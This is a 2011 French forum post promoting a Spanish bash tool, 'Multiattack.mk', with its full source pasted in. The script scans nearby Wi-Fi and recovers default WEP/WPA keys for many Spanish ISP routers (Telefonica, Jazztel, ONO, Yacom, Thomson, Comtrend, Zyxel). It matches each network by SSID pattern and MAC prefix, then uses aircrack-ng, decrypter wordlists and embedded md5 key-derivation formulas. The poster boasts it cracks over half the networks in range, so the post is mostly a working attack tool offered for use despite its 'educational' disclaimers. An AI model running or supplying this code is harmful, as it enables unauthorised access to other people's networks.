Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 25-04-2011 12:53:50

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Multiattack.mk, le Terminator des reds ibériques.

Multiattack.mk V.1.0.3 beta est un module lzm crée par m.k. pour la distro wifiway.
Je vais essayer d'en faire un deb., ça a pas l'air très facile... tongue
C'est vraiment le "tool ultime", on l'ouvre, il se met en mode monitor et lance un scan, on va faire un tour, on revient, on arrête le scan et il nous donne les pass de toutes les reds WEP et WPA pour les quelles il ya des diccionaires (WEP et WPA) c'est à dire plus de 50% des reds que vous aurez dans votre rayon wireless dans quelque coin que se soit de l'Espagne (j'exagère mais c'est presque vrais tongue)
Ce tool ne vaut rien hors d'Espagne, par contre c'est vraiment impréssionant le voir à l'oeuvre juste avec la carte wireless du laptop dans l'appart d'un immeuble collectif dans Barcelone.
capturadepantalla250411.png

capturadepantalla250411.png

capturadepantalla250411.png
Fonctionne avec un nombre hallucinant de reds: WLAN_XX (WEP), WLAN_XXXX (WPA) de Telefonica (plus de 50% de part marché)
                                                                      ONO_XXXX (WEP et WPA) de ONO
                                                                      JAZZTEL_XX (WEP) JAZZTEL_XXXX (WPA)
                                                                      WLAN_XXXXXX YACOM_XXXX (WEP) et WIFIXXXXXX de la compagnie Yacom
                                                                      SPEEDTOUCH, THOMSON et ORANGEXXXXXX le même que le Stkey.

Pour les téléc hargements, je vous renvoi à la page de seguridad wireless dédié au topic, il y 5-6 modules pour wifiway 1, 2.01, 2.02...
Télécharger multiattack
lorsque j'arrive à en faire un deb je le poste
Je vous laisse aussi le code...

#! /bin/bash


#############################################################################################################
# Programa:	multiattack.mk
# Autor:	M.K. Maese Kamara para SeguridadWireless y elhacker
# version: 1.0.3 beta
# Fecha de esta version:        15-4-2011
# Version requerida de aircrack-ng:  AIRCRACK-NG 1.0
# Dependencias: aircrack-ng, grep, awk, xterm, Wlandecrypter, jazzteldecrypter, stkeys, 
#               Dlinkdecrypter, wlan4xx, ono4xx.
#
#
#
#
#          Se han utilizado partes del codigo AIROSCRIPT mejorado Por Chinitiw y
#	   elmanuvolador 
#          para Seguridad Wireless
#	
#  Nota: Este script ha sido creado para desmostrar lo facil que resulta el acceso a una red 
#	 inalambrica
#        cuya clave por defecto no ha sido cambiada.
#        No me hago responsable del uso que se pueda hacer de este script.
#
#        Para mayor seguridad de tu red WIFI pon cifrado WPA y una clave robusta
#
#############################################################################################################
# Establecer directorios de trabajo y valores iniciales
DUMP_key="/root/swireless/airoscript/keys"
DUMP_PATH="/root/swireless/airoscript"
FUDGEFACTOR="2"
WORDLIST="/root/swireless/wordlist/wordlist"
WORDLIST1="/root/swireless/wordlist/diccionariodlink"
WIFI=""
version="Ver.1.0.3 beta"
# crear direcotrio para guardar keys si no existe
if [ -d $DUMP_PATH ] ; then
mkdir /root/swireless/airoscript/keys
fi

#poner y seleccionar tarjeta en modo monitor
function monitor_mode {
clear 
echo ""
echo "                     Ponga la interface en modo monitor "
echo "                   y/o cierre las ventanas para comenzar: "
sleep 2
kmdr-executor  /usr/share/wifiway/airmon-ng.kmdr
clear
INTERFACES=`ip link|egrep "^[0-9]+"|cut -d ':' -f 2 |awk {'print $1'} |grep -v lo`
if [ $WIFI = "" ]
clear
then
echo "=> Seleccione Una interface: "
echo ""
select WIFI in $INTERFACES; do
break;
done
echo ""
echo "Interface seleccionado: $WIFI"
else
clear 
fi
sleep 2
menu
}

# comprobar si tarjeta está en monitor e iniciar capturas
function Scan {
clear
k=""
if [ "$WIFI" = "$k" ]
then
echo ""
echo "                    No hay seleccionada ninguna tarjeta "
echo "                    en modo Monitor."
echo "  "
echo "                    Se ejecutará Airmon para que selecciones una...   "
sleep 3
monitor_mode
else

echo ""
echo "                    Se va a iniciar la captura "
echo ""
echo "                    Cuando tenga suficientes Datas (4 minimo) cierra"
echo "                    la shell de CAPTURAS para continuar...   "
sleep 2
if [ -e $DUMP_PATH/dump-01.cap ]; then
rm  $DUMP_PATH/dump*
   konsole -T "Escaneando Objetivos ..." --nomenubar --schema LightPicture.schema -e airodump-ng -w $DUMP_PATH/dump -a $WIFI
else
   konsole -T "Escaneando Objetivos ..." --nomenubar --schema LightPicture.schema -e airodump-ng -w $DUMP_PATH/dump -a $WIFI
fi
fi
menu
}
#ejecutar AIRCRACK-NG para obtener clave
function crackauto1  {
   xterm -iconic -e aircrack-ng  -l $DUMP_key/$Host_SSID -K -w $WORDLIST -b $Host_MAC -f $FUDGEFACTOR -0 -s  $DUMP_PATH/*.cap 
}
function crackauto2   {
   xterm -iconic -e aircrack-ng -l $DUMP_key/$Host_SSID -K -w $WORDLIST1 -b $Host_MAC -f $FUDGEFACTOR -0 -s  $DUMP_PATH/*.cap
}
# lanzar wlandecrypter
function wlandecrypter_auto {
#	cd /root/swireless/wordlist
#	kmdr-executor /usr/share/wifiway/wlandecrypter.kmdr
        rm -rf /root/swireless/wordlist/*
   xterm -iconic -e wlandecrypter  $Host_MAC $Host_SSID $WORDLIST
	crackauto1
	}
# lanzar jazzteldecrypter
function jazzteldecrypter_auto {
        rm -rf /root/swireless/wordlist/*
   xterm -iconic -e jazzteldecrypter  $Host_MAC $Host_SSID $WORDLIST
	crackauto1
	}
# lanzar stkeys WPA
function stkeys_auto_WPA {
        rm -rf /root/swireless/wordlist/*
	pianista=`echo $Host_SSID | cut -d $hasta -f 2`
	xterm -iconic -e stkeys -i $pianista -v -o $DUMP_key/$Host_SSID
	
	}
function stkeys_auto_WEP {
	pianista=`echo $Host_SSID | cut -d $hasta -f 2`
	xterm -iconic -e stkeys -i $pianista -v -o $WORDLIST
	crackauto1
	}
# lanzar dlinkdecrypter
function dlinkdecrypter_auto {
        rm -rf /root/swireless/wordlist/*
   xterm -iconic -e dlinkdecrypter.sh  $Host_MAC
	crackauto2
	}
# lanzar wlan4xx
function wlan4xx_auto {
#	cd /root/swireless/wordlist
#	kmdr-executor /usr/share/wifiway/wlan4xx.kmdr
        rm -rf /root/swireless/wordlist/*
   xterm -iconic -e wlan4xx  $Host_SSID $Host_MAC $WORDLIST
	crackauto1
	}
# lanzar ono4xx
function ono4xxwep_auto {
#	cd /root/swireless/wordlist
#	kmdr-executor /usr/share/wifiway/ono4xx.kmdr
        rm -rf /root/swireless/wordlist/*
   xterm -iconic -e ono4xx  $Host_SSID $Host_MAC wep $WORDLIST
	crackauto1
	}
function ono4xxwpa_auto {
#	cd /root/swireless/wordlist
#	kmdr-executor /usr/share/wifiway/ono4xx.kmdr
        rm -rf /root/swireless/wordlist/*
   xterm -iconic -e ono4xx  $Host_SSID $Host_MAC wpa $WORDLIST
	crackauto1
	}
function WPAmagic_COMPTREND {
   ESSID=`echo $Host_SSID | awk -F "_" '{print $2}'`
MAC=`echo $Host_MAC | awk -F ":" '{print $1 $2 $3 $4 $5 $6}'`
MACESS=`echo $Host_MAC | awk -F ":" '{print $1 $2 $3 $4}'`$ESSID
cadena=`echo -n "bcgbghgg""$MACESS""$MAC" | md5sum`
if [ ${H_ENC[$r]} != $enc ]; then
clave[$r]=${cadena:0:20}"      "
else 
clave[$r]=C$MACESS"             "
fi
	}
function WPAmagic_ZIXEL {

   ESSID=`echo $Host_SSID | awk -F "_" '{print $2}'`
MAC=`echo $Host_MAC | awk -F ":" '{print $1 $2 $3 $4 $5 $6}'`
MACESS=`echo $Host_MAC | awk -F ":" '{print $1 $2 $3 $4}'`$ESSID
macess_min=`echo $MACESS | tr [:upper:] [:lower:]`
cadena=`echo -n "$macess_min" | md5sum`
clave_min=${cadena:0:20}
clave[$r]=`echo $clave_min | tr [:lower:] [:upper:]`"      "
	}

# leer la key obtenida por Aircrack-ng
function leerkey  {

if [ -e $DUMP_key/$Host_SSID ] ; then
cat $DUMP_key/$Host_SSID > /dev/null ; a=$?
while read clave1 ; do
echo ;
	if [ "$WPA" = "1" ]; then 
	clave[$r]="${clave1} < Posible Key >" 
	fi
done < $DUMP_key/$Host_SSID
	if [ "$WPA" != "1" ]; then 
	clave[$r]=${clave1} 
	fi

rm  -rf $DUMP_key/$Host_SSID
else
clave[$r]="     KEY NO ENCONTRADA    "
break 

fi
}

function autocrack  {

# comprobando si hay capturas, en caso contrario ejecuta el ataque.
	if [ -e $DUMP_PATH/dump-01.csv ] ; then


#rm $DUMP_key/multiattack.txt
# leer datos de captura


ap_array=`cat $DUMP_PATH/dump-01.csv | grep -a -n Station | awk -F : '{print $1}'`
head -n $ap_array $DUMP_PATH/dump-01.csv &> $DUMP_PATH/dump_02.txt
clear
#sleep 1
echo "                         Listado de AP'S Objetivo"
echo ""
echo "        MAC                      ENC    DATAS   SSID"
echo ""
i=1
r=0
while IFS=, read MAC FTS LTS CHANNEL SPEED PRIVACY CYPHER AUTH POWER BEACON IV LANIP IDLENGTH ESSID KEY;do 
 longueur=${#MAC}
   if [ $longueur -ge 17 ]; then
    i=$(($i+1))

#echo -e "\t"$Host_MAC"\t"$Host_ENC"\t"$Host_IV"\t"$Host_SSID

#
# Comprobar que SSID y ENC no esten vacios
# para que no de error en las comparaciones
#
nadaSSID=${#Host_SSID}
nadaENC=${#Host_ENC}
if [ $nadaSSID = 0 ];then
Host_SSID="vacio"
fi
if [ $nadaENC = 0 ];then
Host_ENC="vacio"
fi

# Asignar valores de capturas a variables
aidlenght=$IDLENGTH
assid[$i]=$ESSID
amac[$i]=$MAC
aprivacy[$i]=$PRIVACY
aiv[$i]=$IV
idlenght=${aidlenght[$i]}
ssid=${assid[$i]}
mac=${amac[$i]}
privacy=${aprivacy[$i]}
datas=${aiv[$i]}
Host_ENC=$privacy
Host_MAC=$mac
Host_IV=$datas
acouper=${#ssid}
fin=$(($acouper-idlength))
Host_SSID=${ssid:1:fin}

echo -e "\t"$Host_MAC"\t"$Host_ENC"\t"$Host_IV"\t"$Host_SSID

nombretelefonica[$i]=${Host_SSID:0:5}
nombredlink[$i]=${Host_SSID:0:5}
nombretouch[$i]=${Host_SSID:0:10}
nombrethoms[$i]=${Host_SSID:0:7}
nombrejazztel[$i]=${Host_SSID:0:8}
nombreono[$i]=${Host_SSID:0:3}
nombreyacom[$i]=${Host_SSID:0:5}
nombrewlan[$i]=${Host_SSID:0:4}
nombrewifi[$i]=${Host_SSID:0:4}

H_SSID[$i]=$Host_SSID
H_MAC[$i]=$Host_MAC
H_DATA[$i]=$Host_IV
H_ENC[$i]=$Host_ENC
long_SSID[$i]=${#Host_SSID}


r=$i



  fi
done < $DUMP_PATH/dump_02.txt


# comprobando si hay capturas, en caso contrario ejecuta el ataque.
	if [ "$r" = "1" ] ; then
	echo "                  * * *     A T E N C I O N     * * *                "
	echo ""
	echo "                  No se ha encontrado ninguna captura"
	echo "                  antes debes capturar objetivos"
	echo ""
	else


###
###Comprobando SSID's, creando diccionarios y ejecutando aircrack
###

echo ""
echo ""
echo "--   Procesando Datos... Espere..."
echo ""

redopn="OPN"
  enc="WEP"
telef="WLAN_"
dlink="Dlink"
touch="SpeedTouch"
thoms="Thomson"
 jazz="JAZZTEL_"
  ono="ONO"
 wlan="WLAN"
yacom="YACOM"
 wifi="WiFi"
p=$r

while [ 2 -le $r ]; do
WPA=""
#  asignando MAC conocidas de WLAN_XX

inimac[1]="40:4A:03"
inimac[2]="00:A0:C5"
inimac[3]="00:60:B3"
inimac[4]="00:30:DA"
inimac[5]="00:23:F8"
inimac[6]="00:1F:9F"
inimac[7]="00:1D:20"
inimac[8]="00:1A:2B"
inimac[9]="00:19:CB"
inimac[10]="00:19:15"
inimac[11]="00:16:38"
inimac[12]="00:13:49"
inimac[13]="00:03:DA"
inimac[14]="00:03:C9"
inimac[15]="00:02:CF"
inimac[16]="00:01:38"
inimac[17]="00:01:36"
inimac[18]="E0:91:53"

realmac=${H_MAC[$r]}
inimac_WLAN=${realmac:0:8}
#  comprobando WLAN_XX
la="7"
i=18 # numero de MAC WLAN_xx conocidas
while [ 1 -le $i ]; do
if [ "${nombretelefonica[$r]}" = "$telef" ] && [ ${long_SSID[$r]} = $la ] && [ ${H_DATA[$r]} -ge 4 ] && [ ${H_ENC[$r]} = $enc ] && [  ${inimac[$i]} = $inimac_WLAN ]; then
echo "--   Obteniendo KEY de: ${H_SSID[$r]} Espere . . ."
Host_SSID=${H_SSID[$r]}
Host_MAC=${H_MAC[$r]}
wlandecrypter_auto
leerkey
fi
i=$(($i-1))
done

#  comprobando posible WLAN_XX con nombre ESSID cambiado
if [ "$ESSID_cambiado" = "on" ]; then

while [ 1 -le $i ]; do
if [ "${nombretelefonica[$r]}" != "$telef" ]  && [ "${nombretelefonica[$r]}" != "vacio" ] && [ ${H_DATA[$r]} -ge 4 ] && [ ${H_ENC[$r]} = $enc ] && [  ${inimac[$i]} = $inimac_WLAN ]; then
	echo "--   Obteniendo KEY de: ${H_SSID[$r]}  => *** Posible red WLAN_XX ***  ten paciencia... Tardara unos minutos."
	Host_SSID="WLAN_??"
	Host_MAC=${H_MAC[$r]}
	wlandecrypter_auto
	leerkey
	fi
i=$(($i-1))
done
fi


#  comprobando Dlink
la="5"
if [ "${nombredlink[$r]}" = "$dlink" ] && [ ${long_SSID[$r]} = $la ] && [ ${H_DATA[$r]} -ge 4 ] && [ ${H_ENC[$r]} = $enc ]; then
echo "--   Obteniendo KEY de: ${H_SSID[$r]} Espere . . ."
Host_SSID=${H_SSID[$r]}
Host_MAC=${H_MAC[$r]}
dlinkdecrypter_auto
leerkey
fi

#  comprobando SpeedTouch Thomson WPA
la="16"
if [ "${nombretouch[$r]}" = "$touch" ] && [ ${long_SSID[$r]} = $la ] && [ ${H_ENC[$r]} != $enc ]; then
echo "--   Obteniendo KEY de: ${H_SSID[$r]} Espere . . ."
Host_SSID=${H_SSID[$r]}
Host_MAC=${H_MAC[$r]}
hasta="h"
stkeys_auto_WPA
WPA="1"
leerkey
fi
la="13"
if [ "${nombrethoms[$r]}" = "$thoms" ] && [ ${long_SSID[$r]} = $la ] && [ ${H_ENC[$r]} != $enc ]; then
echo "--   Obteniendo KEY de: ${H_SSID[$r]} Espere . . ."
Host_SSID=${H_SSID[$r]}
Host_MAC=${H_MAC[$r]}
hasta="n"
stkeys_auto_WPA
WPA="1"
leerkey
fi

#  comprobando SpeedTouch Thomson WEP
la="16"
if [ "${nombretouch[$r]}" = "$touch" ] && [ ${long_SSID[$r]} = $la ] && [ ${H_ENC[$r]} = $enc ]; then
echo "--   Obteniendo KEY de: ${H_SSID[$r]} Espere . . ."
Host_SSID=${H_SSID[$r]}
Host_MAC=${H_MAC[$r]}
hasta="h"
stkeys_auto_WEP
leerkey
fi
la="13"
if [ "${nombrethoms[$r]}" = "$thoms" ] && [ ${long_SSID[$r]} = $la ] && [ ${H_ENC[$r]} = $enc ]; then
echo "--   Obteniendo KEY de: ${H_SSID[$r]} Espere . . ."
Host_SSID=${H_SSID[$r]}
Host_MAC=${H_MAC[$r]}
hasta="n"
stkeys_auto_WEP
leerkey
fi

#  asignando MAC conocidas de JAZZTEL_XX
inicmac[1]="00:1A:2B"
realmac=${H_MAC[$r]}
inimacJAZZ=${realmac:0:8}
i=1 # numero de MAC JAZZTEL_XX conocidas 

#  comprobando JAZZTEL_XX
la="10"
while [ 1 -le $i ]; do
if [ "${nombrejazztel[$r]}" = "$jazz" ] && [ ${long_SSID[$r]} = $la ] && [ ${H_DATA[$r]} -ge 4 ] && [ ${H_ENC[$r]} = $enc ] && [ ${H_ENC[$r]} = $enc ]; then
echo "--   Obteniendo KEY de: ${H_SSID[$r]} Espere . . ."
Host_SSID=${H_SSID[$r]}
Host_MAC=${H_MAC[$r]}
jazzteldecrypter_auto
leerkey
fi
i=$(($i-1))
done

#  comprobando posible JAZZTEL_XX con nombre ESSID cambiado
while [ 1 -le $i ]; do
if [ "${nombrejazztel[$r]}" != "$jazz" ] && [ "${nombrejazztel[$r]}" != "vacio" ] && [ ${inimac[$i]} = $inimacJAZZ ] && [ ${H_DATA[$r]} -ge 4 ] && [ ${H_ENC[$r]} = $enc ] && [ "$ESSID_cambiado" = "on" ]; then
echo "--   Obteniendo KEY de: ${H_SSID[$r]}  => *** Posible red JAZZTEL ***  ten paciencia... Tardara unos minutos."
Host_SSID="JAZZTEL_??"
Host_MAC=${H_MAC[$r]}
jazzteldecrypter_auto
leerkey
fi
i=$(($i-1))
done

#  comprobando ONO WEP
#  asignando MAC conocidas de ONOXXXX
la="7"
inimac[1]="00:01:38"
inimac[2]="E0:91:53"
realmac=${H_MAC[$r]}
inimacONO=${realmac:0:8}
i=2 # numero de MAC ONOXXXX conocidas
while [ 1 -le $i ]; do
if [ "${nombreono[$r]}" = "$ono" ] && [ ${long_SSID[$r]} = $la ] && [ $inimacONO = ${inimac[$i]} ] && [ ${H_DATA[$r]} -ge 4 ] && [ ${H_ENC[$r]} = $enc ]; then
echo "--   Obteniendo KEY de: ${H_SSID[$r]} Espere . . ."
Host_SSID=${H_SSID[$r]}
Host_MAC=${H_MAC[$r]}
ono4xxwep_auto
leerkey
fi
i=$(($i-1))
done

#  comprobando WLANXXXXXX
la="10"
if [ "${nombrewlan[$r]}" = "$wlan" ] && [ ${long_SSID[$r]} = $la ] && [ ${H_DATA[$r]} -ge 4 ] && [ ${H_ENC[$r]} = $enc ]; then
echo "--   Obteniendo KEY de: ${H_SSID[$r]} Espere . . ."
Host_SSID=${H_SSID[$r]}
Host_MAC=${H_MAC[$r]}
wlan4xx_auto
leerkey
fi

#  comprobando YACOMxxxxxx
la="11"
if [ "${nombreyacom[$r]}" = "$yacom" ] && [ ${long_SSID[$r]} = $la ] && [ ${H_DATA[$r]} -ge 4 ] && [ ${H_ENC[$r]} = $enc ]; then
echo "--   Obteniendo KEY de: ${H_SSID[$r]} Espere . . ."
Host_SSID=${H_SSID[$r]}
Host_MAC=${H_MAC[$r]}
wlan4xx_auto
leerkey
fi

#  comprobando WiFixxxxxx
la="10"
if [ "${nombrewifi[$r]}" = "$wifi" ] && [ ${long_SSID[$r]} = $la ] && [ ${H_DATA[$r]} -ge 4 ] && [ ${H_ENC[$r]} = $enc ]; then
echo "--   Obteniendo KEY de: ${H_SSID[$r]} Espere . . ."
Host_SSID=${H_SSID[$r]}
Host_MAC=${H_MAC[$r]}
wlan4xx_auto
leerkey
fi

#  comprobando WLAN_XXXX WPA & WEP Router COMPTREND
la="9"
inimac[1]="64:68:0C"
inimac[2]="00:1D:20"
realmac=${H_MAC[$r]}
inimac_COMPTREND=${realmac:0:8}
i=2 # numero de MAC WLAN_XXXX ZIXEL conocidas
while [ 1 -le $i ]; do
realmac=${H_MAC[$r]}
inimac_COMPTREND=${realmac:0:8}
if [ "${nombretelefonica[$r]}" = "$telef" ] && [ ${long_SSID[$r]} = $la ] && [  ${inimac[$i]} = $inimac_COMPTREND ]; then
echo "--   Obteniendo KEY de: ${H_SSID[$r]} Espere . . ."
Host_SSID=${H_SSID[$r]}
Host_MAC=${H_MAC[$r]}
WPAmagic_COMPTREND
fi
i=$(($i-1))
done
#  comprobando JAZZTEL_XXXX WPA & WEP Router COMPTREND
la="12"
inimac[1]="64:68:0C"
inimac[2]="00:1D:20"
realmac=${H_MAC[$r]}
inimac_COMPTREND=${realmac:0:8}
i=2 # numero de MAC WLAN_XXXX ZIXEL conocidas
while [ 1 -le $i ]; do
if [ "${nombrejazztel[$r]}" = "$jazz" ] && [ ${long_SSID[$r]} = $la ] && [  ${inimac[$i]} = $inimac_COMPTREND ]; then
echo "--   Obteniendo KEY de: ${H_SSID[$r]} Espere . . ."
Host_SSID=${H_SSID[$r]}
Host_MAC=${H_MAC[$r]}
WPAmagic_COMPTREND
fi
i=$(($i-1))
done

#  comprobando WLAN_XXXX WPA Router ZIXEL
la="9"
inimac[1]="00:1F:A4"
realmac=${H_MAC[$r]}
inimac_ZIXEL=${realmac:0:8}
i=1 # numero de MAC WLAN_XXXX ZIXEL conocidas
while [ 1 -le $i ]; do
if [ "${nombretelefonica[$r]}" = "$telef" ] && [ ${long_SSID[$r]} = $la ] && [  ${inimac[$i]} = $inimac_ZIXEL ]; then
echo "--   Obteniendo KEY de: ${H_SSID[$r]} Espere . . ."
Host_SSID=${H_SSID[$r]}
Host_MAC=${H_MAC[$r]}
WPAmagic_ZIXEL
fi

# Comprobar si la red está abierta
if [ ${H_ENC[$r]} = $redopn ]; then
Host_SSID=${H_SSID[$r]}
Host_MAC=${H_MAC[$r]}
clave[$r]="         RED ABIERTA      "
fi

i=$(($i-1))
done

r=$(($r-1))
done
#
#   Guardando datos en archivo y mostrando resusltados por pantalla
#
echo " "
echo "--   Terminado. "
sleep 3

> $DUMP_key/multiattack.txt
i=0
contadorkeys=0
while [ 2 -le $p ]; do
	if [ "${clave[$p]}" != "" ]; then
	i=$(($i+1))
	echo "  $i) ${H_MAC[$p]} <==> ${clave[$p]} <==> ${H_ENC[$p]} <=>  ${H_SSID[$p]}" >> $DUMP_key/multiattack.txt
if [ "${clave[$p]}" != "     KEY NO ENCONTRADA    " ] && [ "${clave[$p]}" != "         RED ABIERTA      " ]; then
contadorkeys=$(($contadorkeys+1))
fi
	fi
p=$(($p-1))
done

	if [ "$i" = "0" ];then
	clear
echo ""
echo ""
echo "  	M U L T I A T T A C K   P A R A   P A T R O N E S   C O N O C I D O S"
echo ""
echo "                  * * *     A T E N C I O N     * * *                "
echo ""
echo "                     No Se han obtenido resultados"
echo ""
echo "           Asegurate de que tenias sufifcientes DATA's capturados"
echo ""
	else
	clear
echo ""
echo ""
echo "  	M U L T I A T T A C K   P A R A   P A T R O N E S   C O N O C I D O S"
echo ""
echo "                  * * *     R E S U L T A D O     * * *                "
echo ""
echo "     MAC                     KEY                              ENC       ESSID"
echo ""
	cat $DUMP_key/multiattack.txt
echo ""
echo "        Se ha(n) obtenido la(s) clave(s) por defecto de '$contadorkeys' red(es)"
echo ""
echo "        El resutado, para futuras consultas, ha sido guardado en :"
echo "        $DUMP_key/multiattack.txt"
echo ""
	fi
echo ""
fi 
	else
clear
	echo "                  * * *     A T E N C I O N     * * *                "
	echo ""
	echo "                  No se ha encontrado ninguna captura"
	echo "                  antes debes capturar objetivos"
	echo ""
fi


echo "                     Pulsa INTRO para volver al menú"
	read yn
menu
}


function menu {
#
while true; do
clear
ESSID_cambiado=""
  echo ""
  echo ""
  echo "  	M U L T I A T T A C K   P A R A   P A T R O N E S   C O N O C I D O S"
  echo ""
  echo "	####################################################################"
  echo "	###          Bienvenido a  Multiattack "$version"             ###"
  echo "	###                                                              ###"
  echo "	###                                                              ###"
  echo "	###                                                              ###"
  echo "	###   1) Poner/seleccionar tarjeta en modo monitor               ###"
  echo "	###   2) Iniciar Captura en busca de objetivos                   ###"
  echo "	###   3) Obtener KEY's por defecto                               ###"
  echo "	###   4) Obtener KEY's con ESSID cambiado                        ###"
  echo "	###   5) Ejecutar Airoscript Nuevo WifiWay                       ###"
  echo "	###                                                              ###"
  echo "	###   0) Salir                                                   ###"
  echo "	###                                                              ###"
  echo "	###                                                              ###"
  echo "	###   NOTA: Si Quieres intentar el ataque a AP's cuyo ESSID      ###"
  echo "        ###         por defecto pueda haber sido cambiado, pero          ###"
  echo "	###         posiblemente mantengan la KEY por defecto,           ###"
  echo "	###         escoge la opcion 4), pero ten en cuenta que          ###"
  echo "	###         los ataques pueden demorarse una media de 15         ###"
  echo "	###         minutos por AP con ESSID cambiado.                   ###"
  echo "	###                                                              ###"
  echo "	####################################################################"
  read yn
  case $yn in
    0 ) exit ;;
    1 ) monitor_mode ; menu ; break ;;
    2 ) Scan ; break ;;
    3 ) ESSID_cambiado="off" ; autocrack; break ;;
    4 ) ESSID_cambiado="on" ; autocrack; break ;;
    5 )  konsole -T "Airoscript Nuevo WifiWay" -e airoscript.cw; menu; break ;;
    * ) ;;
  esac
done 
clear
}
# bienvenida
clear
echo "                 Bienvenido a  Multiattack "$version
echo ""
echo "      -Multiattack es una herramienta educativa "
echo "       para el conocimiento del funcionamiento de la seguridad WIFI"
echo "      -Rutas de capturas en /root/swireless/airoscript/*"
echo " "
echo "                    Visita: www.seguridadwireless.net"
echo "                            www.elhacker.net"
echo ""
# acuerdate siempre de esto, eres un vulgar copion que siempre seras un segundon 
#                                (esto me gustó {m.k.})
echo "       Pra mayor seguridad de su red recomiendo que cambie la clave "
echo "       por defecto y se utilice cifrado WPA con una clave robusta"
echo ""
echo "                               -------------"
echo ""
echo "       No me hago responsable del mal uso que se pueda hacer de este Script"
echo ""
echo "                               -------------"
echo ""
echo "                Este mensaje desaparecera en pocos segundos"
sleep 7
echo "                        Saludos desde wifiway.org"
sleep 1
menu

#end

Dernière modification par kcdtv (25-04-2011 13:10:10)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
1 3979 31-08-2011 12:41:01 par vances1
2 1617 09-07-2011 15:05:03 par coyotus

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.025 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]